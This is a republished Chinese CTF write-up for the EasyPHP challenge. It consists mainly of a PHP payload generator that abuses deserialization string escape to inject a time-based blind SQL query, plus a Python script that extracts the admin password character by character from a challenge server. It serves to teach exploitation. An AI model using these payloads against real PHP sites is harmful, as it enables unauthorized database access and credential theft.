ICode9

精准搜索请尝试: 精确搜索
首页 > 编程语言> 文章详细

2020i春秋新春公益赛 EasyPHP

2020-02-24 22:01:02  阅读:396  来源: 互联网

标签:code CtrlCase 2020i age sql 新春 EasyPHP nickname public


反序列化字符逃逸+反序列化执行sql语句盲注。
一开始想改admin密码,浪费了太多时间

solve.php

//solve.php
<?php
function safe($parm)
{
    $array = array('union', 'regexp', 'load', 'into', 'flag', 'file', 'insert', "'", '\\', "*", "alter");
    return str_replace($array, 'hacker', $parm);
}

class User
{
    public $age = null;
    public $nickname = null;

    public function __construct($age, $nickname)
    {
        $this->age = $age;
        $this->nickname = $nickname;
    }
}

class Info
{
    public $age;
    public $nickname;
    public $CtrlCase;

    public function __construct($age = null, $nickname = null, $CtrlCase = null)
    {
        $this->age = $age;
        $this->nickname = $nickname;
        $this->CtrlCase = $CtrlCase;
    }
}

Class UpdateHelper
{
    public $sql;

    public function __construct($sql)
    {
        $this->sql = $sql;
    }
}

class dbCtrl
{
    public $name;

    public function __construct($name)
    {
        $this->name = $name;
    }
}

$sql = $sql = "SELECT if(substr((select password from user where username=0x61646D696E),".$_GET['pos'].",1)=0x".bin2hex($_GET['hex']).",sleep(2),0)";
$e = new dbCtrl('admin');
$d = new Info(null,null,$e);
$c = new User($sql, $d);
$b = new UpdateHelper($c);

$age = 18;
$padding = 'flag' . (strlen($_GET['pos'])==1?'union':'flag');
$payload = str_repeat('*', 58).$padding;
//$payload = str_repeat('*', 58).'flagunion';
$nickname = $payload."\";s:8:\"CtrlCase\";".serialize($b)."}";
echo $nickname;

exp.py

from time import sleep

import requests
import string

payload_url = "http://localhost/ctf/solve.php"
url = "http://b9df8ffa-d7c7-4a11-a7b4-dc4227a83473.node3.buuoj.cn/update.php"
result = ""
s = requests.session()

for i in range(1, 33):
    for x in string.ascii_lowercase + string.digits:
        data = {
            "age": "18",
            "nickname": requests.get(payload_url + f"?hex={x}&pos={i}").text
        }
        try:
            code = 0
            flag = False
            while code != 200:
                response = s.post(url, data=data, timeout=2)
                code = response.status_code
                print(code, i, x)
                sleep(0.15)
        except:
            result += x
            print(result)
            break

标签:code,CtrlCase,2020i,age,sql,新春,EasyPHP,nickname,public
来源: https://www.cnblogs.com/20175211lyz/p/12359085.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有